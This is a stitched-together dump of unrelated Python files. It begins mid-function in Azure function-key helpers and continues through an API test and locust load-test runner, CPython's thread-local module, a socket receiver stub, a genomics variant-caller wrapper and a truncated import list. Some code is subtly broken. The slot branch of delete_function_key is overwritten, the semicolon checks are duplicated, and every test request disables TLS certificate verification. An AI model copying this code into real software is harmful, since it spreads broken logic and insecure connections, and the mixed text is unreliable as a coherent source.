if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
name1=key_name,
value=key_value)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
result = client.web_apps.delete_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
raw=True)
result = client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' from function '{}'".format(key_name, function_name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' does not exist in function '{}'".format(key_name, function_name)
return result
|
main.py
|
import shutil
from threading import Thread
from threading import Lock
import unittest
from optparse import OptionParser
import ddt
import requests
from requests.packages import urllib3
import json
from json import JSONDecodeError
import apirun
from .genReport import html_report
from .getToken import get_token
from .extractExcel import HandleExcel
from .mail import *
from .PressureTest import *
from .PtSlave import ConnectSlave
urllib3.disable_warnings()
logger = logging.getLogger(__name__)
version = apirun.__version__
report_dir = ''
headers = {"Content-Type": "application/json"}
_success = 0
_failure = 0
_error = 0
_count_lock = Lock()
def add_success(num_s):
global _success
_count_lock.acquire()
_success += num_s
_count_lock.release()
def add_failure(num_f):
global _failure
_count_lock.acquire()
_failure += num_f
_count_lock.release()
def add_error(num_e):
global _error
_count_lock.acquire()
_error += num_e
_count_lock.release()
def parse_options():
"""
Handle command-line options with optparse.OptionParser.
Return list of arguments, largely for use in `parse_arguments`.
"""
# Initialize
parser = OptionParser(usage="apirun [options] [ApiRunClass [ApiRunClass2 ... ]]")
parser.add_option(
'-f', '--testcasefile',
dest='testcasefile',
help="Testcase to run, e.g. '../testcase.xls'."
)
parser.add_option(
'-F', '--testcasefolder',
dest='testcasefolder',
help="all testcase in the foler to run.",
default=""
)
parser.add_option(
'--report',
action='store',
type='str',
dest='report',
default='report',
help="Store the reports.",
)
# Version number (optparse gives you --version but we have to do it
# ourselves to get -V too. sigh)
parser.add_option(
'-V', '--version',
action='store_true',
dest='show_version',
default=False,
help="show program's version number and exit"
)
parser.add_option(
'--demo',
action='store_true',
dest='make_demo',
default=False,
help="make demo xls in working folder"
)
parser.add_option(
'--email',
action='store_true',
dest='email',
default=False,
help='sending email after finishing api test'
)
parser.add_option(
'--from',
action='store_true',
dest='email_from',
default=False,
help='the user who sends email'
)
parser.add_option(
'--to',
action='store_true',
dest='email_to',
default=False,
help='the user(s) who receive email'
)
parser.add_option(
'--subject',
action='store_true',
dest='email_subject',
default=False,
help='the email subject'
)
parser.add_option(
'--host',
action='store_true',
dest='email_host',
default=False,
help='the email host'
)
parser.add_option(
'--pt', '--pressuretest',
dest='PtFile',
help='run pressure test according to the xls, supported by locustio'
)
parser.add_option(
'--pt-demo',
action='store_true',
dest='PtDemo',
default=False,
help='make PT demo file in current folder'
)
parser.add_option(
'--pt-not-run',
dest='PtNotRun',
help='just make locustfile according to the xls'
)
parser.add_option(
'--master',
action='store_true',
default=False,
dest='master',
help='Set locust to run in distributed mode with this process as master, use this parameter with --pt'
)
# Finalize
# Return three-tuple of parser + the output from parse_args (opt obj, args)
opts, args = parser.parse_args()
return parser, opts, args
def run_test(title, filename, report_path, description, testcase):
test = unittest.TestLoader().loadTestsFromTestCase(testcase)
suit = unittest.TestSuite([test])
runner, fp = html_report(title=title, filename=filename, report_path=report_path, description=description)
results = runner.run(suit)
fp.close()
e = results.error_count
f = results.failure_count
s = results.success_count
add_success(s)
add_failure(f)
add_error(e)
def get_apirun_path():
if 'win' in sys.platform:
python3_path = os.getenv('PYTHON')
if not python3_path:
python3_path = os.getenv('PYTHON3')
if python3_path:
if 'python3' in python3_path.lower():
if 'scripts' in python3_path.lower():
apirun_path = os.path.join(os.path.dirname(os.path.dirname(python3_path)), 'Lib\\site-packages\\apirun\\')
else:
apirun_path = os.path.join(python3_path, 'Lib\\site-packages\\apirun\\')
else:
sys_path = os.getenv('path').split(';')
for each in sys_path:
if 'python3' in each.lower() and 'scripts' not in each.lower():
python3_path = each
break
apirun_path = os.path.join(python3_path, 'Lib\\site-packages\\apirun\\')
elif 'linux' in sys.platform:
with os.popen('find /usr/local/ -name apirun -type d') as lp:
apirun_path = lp.read().strip()
return apirun_path
def str_to_json(data):
data = str(data).replace('\'', '"')
j = json.loads(data, encoding='utf-8')
return j
def start_test(testcasefile):
testcase_data = HandleExcel(testcasefile)
token_url, token_body, token_para, token_locate = testcase_data.auth_info()
token_body = str_to_json(token_body)
try:
token = get_token(token_url, token_body, token_locate)
except KeyError:
logger.error('Please check your auth info, cannot get correct response.')
sys.exit(1)
except Exception as e:
logger.error('{}'.format(e))
sys.exit(1)
global headers
headers[token_para] = token
testcase_list = testcase_data.testcase_list()
report_title, report_description = testcase_data.report_info()
@ddt.ddt
class ApiRun(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.headers = headers
@classmethod
def tearDownClass(cls):
pass
@ddt.idata(testcase_list)
@ddt.unpack
def test_api(self, title, url, auth, method, query, request_data, expect_status, expect_str):
print('用例标题:' + title + 'END') # 死活别删这一段,正则匹配这段内容,将标题添加到HTML报告中
method = method.upper()
if query:
query = str_to_json(query)
if request_data:
request_body = str_to_json(request_data)
else:
request_body = None
exp_status_code = int(expect_status)
_headers = self.headers
if str(auth) == '0' or auth == 'FALSE':
_headers = {"Content-Type": "application/json"}
if method == 'GET': # GET
response_actual = requests.get(url=url, headers=_headers, params=query, verify=False)
elif method == 'POST': # POST
response_actual = requests.post(url=url, headers=_headers, json=request_body, params=query, verify=False)
elif method == 'DELETE': # DELETE
response_actual = requests.delete(url=url, headers=_headers, params=query, verify=False)
elif method == 'PUT': # PUT
response_actual = requests.put(url=url, headers=_headers, params=query, json=request_body, verify=False)
elif method == 'PATCH': # patch
response_actual = requests.patch(url=url, headers=_headers, params=query, json=request_body, verify=False)
elif method == 'HEAD':
response_actual = requests.head(url=url, headers=_headers, params=query, verify=False)
elif method == 'OPTIONS':
response_actual = requests.options(url=url, headers=_headers, params=query, verify=False)
else: # Other method, such as TRACE
response_actual = requests.request(method=method, url=url, headers=_headers, params=query, json=request_body, verify=False)
actual_status_code = int(response_actual.status_code)
if actual_status_code == exp_status_code:
print('Status code is same: {sc}'.format(sc=actual_status_code))
if expect_str:
expect_str = expect_str.strip()
act_response = response_actual.json()
print('Actual response: {}'.format(act_response))
if expect_str.endswith(';'):
expect_str = expect_str.strip(';')
if expect_str.endswith(';'):
expect_str = expect_str.strip(';')
if (';' not in expect_str) and (';' not in expect_str):
self.assertIn(expect_str, str(act_response), msg='{} is not in response'.format(expect_str))
else:
if ';' in expect_str:
expect_str_list = expect_str.split(';')
else:
expect_str_list = expect_str.split(';')
for each_str in expect_str_list:
each_str = each_str.strip()
self.assertIn(each_str, str(act_response), msg='{} is not in response'.format(each_str))
else:
try:
act_response = response_actual.json()
print('Actual response: {}'.format(act_response))
except JSONDecodeError:
act_response = response_actual.text
print('Not json response: {}'.format(act_response))
self.fail('Status code is different! Actual code is {}'.format(actual_status_code))
report_filename = testcasefile.replace('\\', '-')
run_test(title=report_title, filename=report_filename, report_path=report_dir, description=report_description,
testcase=ApiRun)
def pt_slave(ip, username, password, ptfile, ptcommand):
connect = ConnectSlave(ip, username, password)
is_locust = connect.check_locust()
if is_locust:
dest = '/root/' + ptfile
connect.trans_file(source=ptfile, dest=dest)
connect.remote_command(command=ptcommand)
else:
logging.error('Slave {} cannot run locust.'.format(ip))
def main():
parser, options, arguments = parse_options()
# setup logging
# logger = logging.getLogger(__name__)
apirun_path = get_apirun_path()
pwd = os.getcwd()
_run = False
_email_mark = False
if options.show_version:
print("Apirun %s" % (version,))
sys.exit(0)
if options.make_demo:
if not apirun_path:
logger.error('''Cannot locate Python path, make sure it is in right place. If windows add it to sys PATH,
if linux make sure python is installed in /usr/local/lib/''')
sys.exit(1)
demo_path = os.path.join(apirun_path, 'demo', 'demo_testcase.xls')
new_demo = os.path.join(pwd, 'demo.xls')
shutil.copyfile(demo_path, new_demo)
sys.exit(0)
if options.PtDemo:
if not apirun_path:
logger.error('''Cannot locate Python path, make sure it is in right place. If windows add it to sys PATH,
if linux make sure python is installed in /usr/local/lib/''')
sys.exit(1)
pt_demo_path = os.path.join(apirun_path, 'demo', 'demo_pressuretest.xls')
pt_new_demo = os.path.join(pwd, 'PtDemo.xls')
shutil.copyfile(pt_demo_path, pt_new_demo)
sys.exit(0)
if options.email:
global yag, email_to, subject
_email = []
if not (options.email_from and options.email_to):
if not os.path.isfile('email.json'):
logger.error('It is your first time to use email function, please fill email.json and run it again.')
demo_email = os.path.join(apirun_path, 'demo', 'email.json')
new_email = os.path.join(pwd, 'email.json')
shutil.copyfile(demo_email, new_email)
sys.exit(0)
else:
with open('email.json', 'r') as ef:
email_info = json.load(ef)
email_from = email_info['from']
subject = email_info['subject']
if subject == '': subject = 'API Test Result'
receivers = email_info['receiver']
email_to = []
for _e in receivers.keys():
email_to.extend(receivers[_e])
email_host = email_info['host']
if options.email_host:
email_host = options.email_host
if options.email_from:
email_from = options.email_from
if options.email_to:
_to = options.email_to
if _to in receivers.keys():
email_to = receivers[_to]
else:
email_to = email_in_cil(_to)
if options.email_subject:
subject = options.email_subject
else:
email_from = options.email_from
email_to = options.email_to
email_host = options.email_host
if options.email_subject: subject = options.email_subject
else: subject = 'API Test Result'
_email.append(email_from)
_email.extend(email_to)
for _each in _email:
if check_address(_each): pass
else:
logger.error('Email address is not correct: {}'.format(_each))
sys.exit(1)
yag = init_email(username=email_from, host=email_host)
_email_mark = True
if options.email_from:
if not options.email:
logger.error('Cannot use --from without --email.')
sys.exit(1)
if options.email_to:
if not options.email:
logger.error('Cannot use --to without --email.')
sys.exit(1)
if options.email_host:
if not options.email:
logger.error('Cannot use --host without --email.')
sys.exit(1)
if options.email_subject:
if not options.email:
logger.error('Cannot use --subject without --email.')
sys.exit(1)
if options.master:
if not options.PtFile:
logger.error('Cannot use --master without --pt.')
sys.exit(1)
if options.report:
global report_dir
report_dir = options.report
if not apirun_path:
logger.error('''Cannot locate Python path, make sure it is in right place. If windows add it to sys PATH,
if linux make sure python is installed in /usr/local/lib/''')
sys.exit(1)
try:
os.makedirs(os.path.join(report_dir, 'js'))
js_file = os.path.join(apirun_path, 'js', 'echarts.common.min.js')
shutil.copyfile(js_file, os.path.join(report_dir, 'js', 'echarts.common.min.js'))
except FileExistsError:
pass
if options.testcasefile:
if options.testcasefolder:
logger.error('Cannot use -f and -F together.')
sys.exit(1)
testcasefile = options.testcasefile
if not testcasefile.endswith('.xls'):
logger.error("Testcasefile must be end with '.xls' and see --help for available options.")
sys.exit(1)
if not os.path.isfile(testcasefile):
logger.error('Testcasefile is not exist, please check it.')
sys.exit(1)
start_test(testcasefile=testcasefile)
_run = True
if options.testcasefolder:
if options.testcasefile:
logger.error('Cannot use -f and -F together.')
sys.exit(1)
testcase_folder = options.testcasefolder
if testcase_folder:
if not os.path.isdir(testcase_folder):
logger.error('Testcasefolder is not exist, please check it.')
sys.exit(1)
_dir, _subdir, files = list(os.walk(testcase_folder))[0]
else:
_dir, _subdir, files = list(os.walk(os.getcwd()))[0]
testcase_file_list = []
for each in files:
if each.endswith('.xls'):
testcase_file_list.append(os.path.join(testcase_folder, each))
if len(testcase_file_list) == 0:
logger.error('There is no testcase file in Testcasefolder.')
sys.exit(1)
for testcasefile in testcase_file_list:
t = Thread(target=start_test, args=(testcasefile,))
print(t)
print('+++++++++++++++ ' + testcasefile)
t.start()
t.join()
_run = True
if options.PtNotRun:
if options.PtFile:
logger.error('Cannot use --pt and --pt-not-run together.')
sys.exit(1)
pt_file = options.PtNotRun
if not pt_file.endswith('.xls'):
logger.error("PressureTest file must be end with '.xls' and see --help for available options.")
sys.exit(1)
if not os.path.isfile(pt_file):
logger.error('PressureTest file is not exist, please check it.')
sys.exit(1)
make_locustfile(pt_file)
logger.info('Generate locustfile success.')
sys.exit(0)
if options.PtFile:
if options.PtNotRun:
logger.error('Cannot use --pt and --pt-not-run together.')
sys.exit(1)
pt_file = options.PtFile
if not pt_file.endswith('.xls'):
logger.error("PressureTest file must be end with '.xls' and see --help for available options.")
sys.exit(1)
if not os.path.isfile(pt_file):
logger.error('PressureTest file is not exist, please check it.')
sys.exit(1)
global _run_pt
_run_pt = False
make_locustfile(pt_file)
ptpy = pt_file.replace('.xls', '.py')
pt_report = pt_file.strip('.xls')
if not options.master:
locust_cli = 'locust -f {locustfile} --csv={ptReport}'.format(locustfile=ptpy, ptReport=pt_report)
try:
os.system(locust_cli)
except KeyboardInterrupt:
shutil.move(pt_report+'_distribution.csv', os.path.join(report_dir, pt_report+'_distribution.csv'))
shutil.move(pt_report+'_requests.csv', os.path.join(report_dir, pt_report+'_requests.csv'))
_run_pt = True
else:
pt_s = PtExcel(pt_file)
master_ip, pt_slave_info = pt_s.pt_slave()
if master_ip == '':
logger.error('master IP cannot be None if you use --master')
sys.exit(1)
if 'win' in sys.platform.lower():
locust_cli_master = 'locust -f {locustfile} --csv={ptReport} --master'.format(locustfile=ptpy, ptReport=pt_report)
else:
locust_cli_master = 'locust -f {locustfile} --csv={ptReport} --master'.format(locustfile=ptpy, ptReport=pt_report)
try:
locust_cli_slave = 'nohup locust -f /root/{locustfile} --slave --master-host={masteIP} > /dev/null 2>&1 &'.format(locustfile=ptpy, masteIP=master_ip)
for slave in pt_slave_info:
slave_ip, slave_username, slave_password = slave
_t = Thread(target=pt_slave, args=(slave_ip, slave_username, slave_password, ptpy, locust_cli_slave))
logger.info('Prepare slave {}'.format(slave_ip))
_t.start()
_t.join()
os.system(locust_cli_master)
except KeyboardInterrupt:
pass
except Exception as e:
logger.error('Must someting happend, collect Exceptions here: {}'.format(e))
finally:
shutil.move(pt_report + '_distribution.csv', os.path.join(report_dir, pt_report + '_distribution.csv'))
shutil.move(pt_report + '_requests.csv', os.path.join(report_dir, pt_report + '_requests.csv'))
_run_pt = True
if _run or _run_pt:
if _run:
print('==================')
results_message = '''
Results:
Total: {t}
Success: {s}
Failure: {f}
Error: {e}
'''.format(t=(_success + _failure + _error), s=_success, f=_failure, e=_error)
print(results_message)
else:
results_message = 'Pressure Test Result.'
if _email_mark:
attachment = subject.replace(' ', '_') + '.zip'
zip_report(report_dir, attachment)
send_email(yag, subject=subject, to=email_to, msg=results_message, attachment=attachment)
else:
sys.exit(0)
sys.exit(0)
if __name__ == '__main__':
main()
|
_threading_local.py
|
"""Thread-local objects.
(Note that this module provides a Python version of the threading.local
class. Depending on the version of Python you're using, there may be a
faster one available. You should always import the `local` class from
`threading`.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = sorted(mydata.__dict__.items())
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... initialized = False
... def __init__(self, **kw):
... if self.initialized:
... raise SystemError('__init__ called too many times')
... self.initialized = True
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red'), ('initialized', True)], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
from weakref import ref
from contextlib import contextmanager
__all__ = ["local"]
# We need to use objects from the threading module, but the threading
# module may also want to use our `local` class, if support for locals
# isn't compiled in to the `thread` module. This creates potential problems
# with circular imports. For that reason, we don't import `threading`
# until the bottom of this file (a hack sufficient to worm around the
# potential problems). Note that all platforms on CPython do have support
# for locals in the `thread` module, and there is no circular import problem
# then, so problems introduced by fiddling the order of imports here won't
# manifest.
class _localimpl:
"""A class managing thread-local dicts"""
__slots__ = 'key', 'dicts', 'localargs', 'locallock', '__weakref__'
def __init__(self):
# The key used in the Thread objects' attribute dicts.
# We keep it a string for speed but make it unlikely to clash with
# a "real" attribute.
self.key = '_threading_local._localimpl.' + str(id(self))
# { id(Thread) -> (ref(Thread), thread-local dict) }
self.dicts = {}
def get_dict(self):
"""Return the dict for the current thread. Raises KeyError if none
defined."""
thread = current_thread()
return self.dicts[id(thread)][1]
def create_dict(self):
"""Create a new dict for the current thread, and return it."""
localdict = {}
key = self.key
thread = current_thread()
idt = id(thread)
def local_deleted(_, key=key):
# When the localimpl is deleted, remove the thread attribute.
thread = wrthread()
if thread is not None:
del thread.__dict__[key]
def thread_deleted(_, idt=idt):
# When the thread is deleted, remove the local dict.
# Note that this is suboptimal if the thread object gets
# caught in a reference loop. We would like to be called
# as soon as the OS-level thread ends instead.
local = wrlocal()
if local is not None:
dct = local.dicts.pop(idt)
wrlocal = ref(self, local_deleted)
wrthread = ref(thread, thread_deleted)
thread.__dict__[key] = wrlocal
self.dicts[idt] = wrthread, localdict
return localdict
@contextmanager
def _patch(self):
old = object.__getattribute__(self, '__dict__')
impl = object.__getattribute__(self, '_local__impl')
try:
dct = impl.get_dict()
except KeyError:
dct = impl.create_dict()
args, kw = impl.localargs
self.__init__(*args, **kw)
with impl.locallock:
object.__setattr__(self, '__dict__', dct)
yield
object.__setattr__(self, '__dict__', old)
class local:
__slots__ = '_local__impl', '__dict__'
def __new__(cls, *args, **kw):
if (args or kw) and (cls.__init__ is object.__init__):
raise TypeError("Initialization arguments are not supported")
self = object.__new__(cls)
impl = _localimpl()
impl.localargs = (args, kw)
impl.locallock = RLock()
object.__setattr__(self, '_local__impl', impl)
# We need to create the thread dict in anticipation of
# __init__ being called, to make sure we don't call it
# again ourselves.
impl.create_dict()
return self
def __getattribute__(self, name):
with _patch(self):
return object.__getattribute__(self, name)
def __setattr__(self, name, value):
if name == '__dict__':
raise AttributeError(
"%r object attribute '__dict__' is read-only"
% self.__class__.__name__)
with _patch(self):
return object.__setattr__(self, name, value)
def __delattr__(self, name):
if name == '__dict__':
raise AttributeError(
"%r object attribute '__dict__' is read-only"
% self.__class__.__name__)
with _patch(self):
return object.__delattr__(self, name)
from threading import current_thread, RLock
|
receiver.py
|
#! /usr/bin/env python
# coding:utf-8
import socket
import threading
import re
import csv
csv_file_name = "data"
def check_http(request):
if "HTML" in request:
return True
return False
# check format of received message.
# iff format is valid, save data in format of CSV and return True
def check_format_and_save(msg):
# ここになにか処理を書く
# write to csv via append mode
with open(csv_file_name, "a") as f:
pass # 個々になにか処理を書く
return True
bind_ip = 'xx.xx.xx.xx'
bind_port = 49498
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
print("[*] listen {}:{}".format(bind_ip,str(bind_port)))
def handle_client(client_socket):
bufsize=1024
request = client_socket.recv(bufsize).decode("utf-8")
print("[*] recv:")
print(request)
if(check_format_and_save(request)):
print("[O] sending OK")
client_socket.send(b"OK\r\n")
else:
if check_http(request):
global csv_file_name
data_size = 0
#with open(csv_file_name, "r") as f:
# data_size = len(f.readlines())
message = b"HTTP/1.1 200 OK\r\n"
message += b"Connection: Keep-Alive\r\n"
message += b"Content-Type: text/html; charset=utf-8\r\n"
message += b"\r\n"
message += b"Hello.\r\n"
message += bytes("We have now {} lines of data...".format(hex(data_size)), "utf-8")
client_socket.send(message)
else:
print("[!] sending ERR")
client_socket.send(b"ERROR\r\n")
while True:
client,addr = server.accept()
print("[*] connected from: {}:{}".format(addr[0],str(addr[1])))
client_handler = threading.Thread(target=handle_client,args=(client,))
client_handler.start()
|
variantcaller.py
|
#! /usr/bin/env python
# coding=utf-8
"""Module Description
Copyright (c) 2017 Jianfeng Li<lee_jianfeng@sjtu.edu.cn>
This code is free software; you can redistribute it and/or modify it
under the terms of the MIT License.
@variantcaller Variant Call Module
@status: experimental
@version: $Revision$
@author: Jianfeng Li
@contact: lee_jianfeng@sjtu.edu.cn
"""
from utils import *
from bam import *
from vcf import *
# ------------------------------------
# constants
# ------------------------------------
logging.basicConfig(level = 20,
format = '%(levelname)-5s @ %(asctime)s: %(message)s ',
datefmt = '%a, %d %b %Y %H:%M:%S',
stream = sys.stderr,
filemode = "w"
)
# ------------------------------------
# Misc functions
# ------------------------------------
error = logging.critical
warn = logging.warning
debug = logging.debug
info = logging.info
# ------------------------------------
# Debug file
# ------------------------------------
def prepare_optparser ():
"""Prepare optparser object. New options will be added in this
function first.
"""
usage = "usage: %prog -c mysample.cfg -s A01A -1 A01_1.fq -2 A02_2.fq"
description = "Please set the sample name. e.g. L04A, L04C, L04T."
optparser = OptionParser(version = "0.0.1", description = description, usage = usage, add_help_option = False)
optparser.add_option("-h", "--help", action = "help", help = "Show this help message and exit.")
optparser.add_option("-c", "--config", dest = "config", default = "config.cfg" ,type = "string",
help = "Set the config File.")
optparser.add_option("-s", "--samplename", dest = "samplename" ,type = "string",
help = "Set the samplename.")
optparser.add_option("-i", "--in_bam", dest = "in_bam" ,type = "string",
help = "If you have process the preprocess step, you can set this to your bam file path.(eg. case,control, or case only)")
optparser.add_option("-t", "--seq_type", dest = "seq_type" ,type = "string", default = "dna",
help = "Point the seq type[dna]")
optparser.add_option("-o", "--out_dir", dest = "out_dir" ,type = "string",
help = "Set the vcf file out_dir.(Required)")
return(optparser)
def opt_validate (optparser):
"""Validate options from a OptParser object.
Ret: Validated options object.
"""
(options, args) = optparser.parse_args()
if not options.config:
optparser.print_help()
sys.exit(1)
elif not options.in_bam:
optparser.print_help()
sys.exit(1)
elif not options.out_dir:
optparser.print_help()
sys.exit(1)
return(options)
class FundementalCaller(object):
def __init__(self, caller_name):
self.mode = "germline"
self.avaliable_caller = ["lofreq","varscan","mutect","tvc","haplotypecaller","unifiedgenotyper","pindel"]
if caller_name.lower() in self.avaliable_caller:
self.caller_name = caller_name.lower()
else:
info("Now the avaliable variant_caller is only:" + self.avaliable_caller.join(",") + "! Please set correct caller in config file.")
def set_out_dir(self, out_dir):
self.out_dir = out_dir
create_dir(out_dir)
def set_caller_mode(self, mode):
if mode == "somatic":
self.mode = mode
elif mode == "germline":
self.mode = mode
else:
self.mode = False
def set_bamfile(self, samplename, case="", control="", runid = ""):
if case != "":
self.case = BamFile(case, samplename, self.cfg, runid)
if not self.case.isexist():
info(self.case.path + " is not exists! Please check the path!")
if control!="":
self.control = BamFile(control, samplename, self.cfg, runid)
if not self.control.isexist():
info(self.control.path + " is not exists! Please check the path!")
def set_config(self, cfg): #if have two class level, the method can be merge in __init__
self.cfg = cfg
def set_seq_type(self, seq_type):
self.seq_type = seq_type
def call_variant(self):
if self.mode == "germline":
out_vcf=""
if self.caller_name == "tvc": # For Ion Torrent only
self.case.index()
out_vcf = self.case.torrent_caller(self.out_dir)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "haplotypecaller":
self.case.index()
out_vcf = self.case.haplotype_caller(self.out_dir, seq_type = self.seq_type)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "unifiedgenotyper":
self.case.index()
out_vcf = self.case.unifiedgenotyper_caller(self.out_dir)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "varscan":
self.case.index()
out_vcf = self.case.varscan_caller(self.out_dir)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "lofreq":
self.case.index()
out_vcf = self.case.lofreq_caller(self.out_dir)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "pindel":
self.case.index()
out_vcf = self.case.pindel_caller(self.out_dir)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if out_vcf:
return(out_vcf)
else:
msg = "Running %s in %s mode to %s fail! Can't generate the %s file." % (
self.caller_name, self.mode, self.case, out_vcf)
return(False)
elif self.mode == "somatic":
out_vcf=""
if self.caller_name == "mutect":
self.case.index()
self.control.index()
out_vcf = self.case.mutect_caller(self.control, self.out_dir)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "haplotypecaller":
self.case.index()
self.control.index()
out_vcf = self.case.haplotype_caller(
self.out_dir, self.control, seq_type = self.seq_type)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "unifiedgenotyper":
self.case.index()
self.control.index()
out_vcf = self.case.unifiedgenotyper_caller(
self.out_dir, self.control.path)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "varscan":
self.case.index()
self.control.index()
out_vcf = self.case.varscan_caller(
self.out_dir, self.control.path)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "lofreq":
self.case.index()
self.control.index()
out_vcf = self.case.lofreq_caller(
self.out_dir, self.control.path)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "tvc": # For Ion Torrent only
self.case.index()
self.control.index()
out_vcf = self.case.torrent_caller(
self.out_dir, self.control.path)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "pindel":
self.case.index()
out_vcf = self.case.pindel_caller(
self.out_dir, self.control.path)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if out_vcf:
return(out_vcf)
else:
msg = "Running %s in %s mode to %s fail! Can't generate the %s file." % (
self.caller_name, self.mode, self.case, out_vcf)
def variant_caller(options):
cfg = get_config(options.config)
caller = cfg["caller"]
out_dir = options.out_dir
seq_type = options.seq_type
samplename = options.samplename
in_bam = options.in_bam
if not in_bam:
return(False)
caller_list = caller.split(",")
vcf_list = {}
threads = []
for caller in caller_list:
caller = caller.capitalize()
def func(caller = caller, cfg = cfg, seq_type = seq_type, out_dir = out_dir, samplename = samplename, in_bam = in_bam):
variantcaller = FundementalCaller(caller)
variantcaller.set_config(cfg)
variantcaller.set_seq_type(seq_type)
variantcaller.set_out_dir(out_dir + "/" + samplename + "/" + caller.capitalize())
variantcaller.set_bamfile(samplename, in_bam, runid = options.runid)
# VcfFile object dict, using all mapped bam file to generate vcf file
vcf_list[caller] = variantcaller.call_variant()
if caller != "Mutect":
threads.append(threading.Thread(target = func))
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()
return(vcf_list)
def variant_caller_somatic(options):
cfg = get_config(options.config)
caller = cfg["caller"]
out_dir = options.out_dir
seq_type = options.seq_type
samplename = options.samplename
case_in_bam, control_in_bam = options.in_bam.split(",")
if not case_in_bam or not control_in_bam:
return(False)
caller_list = caller.split(",")
vcf_list = {}
threads = []
for caller in caller_list:
def func(caller = caller, cfg = cfg, seq_type = seq_type, out_dir = out_dir,
samplename = samplename, case_in_bam = case_in_bam, control_in_bam = control_in_bam):
variantcaller = FundementalCaller(caller)
variantcaller.set_caller_mode("somatic")
variantcaller.set_config(cfg)
variantcaller.set_seq_type(seq_type)
variantcaller.set_out_dir(out_dir + "/" + getid(samplename) + "/" + caller.capitalize())
variantcaller.set_bamfile(getid(samplename) + "T", case_in_bam,control_in_bam, options.runid)
# VcfFile object dict, using all mapped bam file to generate vcf file
vcf_list[caller] = variantcaller.call_variant()
threads.append(threading.Thread(target = func))
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()
return(vcf_list)
def main():
options = opt_validate(prepare_optparser())
if len(options.in_bam.split(",")) ==1:
variant_caller(options)
elif len(options.in_bam.split(",")) ==2:
variant_caller_somatic(options)
if __name__ == "__main__":
try:
main()
info ("Successful run!!!")
except KeyboardInterrupt:
warn("User interrupts me! ;-) See you!")
sys.exit(0)
|
pub.py
|
import datetime
import json
import random
import re
from collections import Counter
from collections import OrderedDict
from collections import defaultdict
from enum import Enum
from threading import Thread
import boto3
import dateutil.parser
import gzip
import requests
import urllib.parse
from dateutil.relativedelta import relativedelta
from lxml import etree
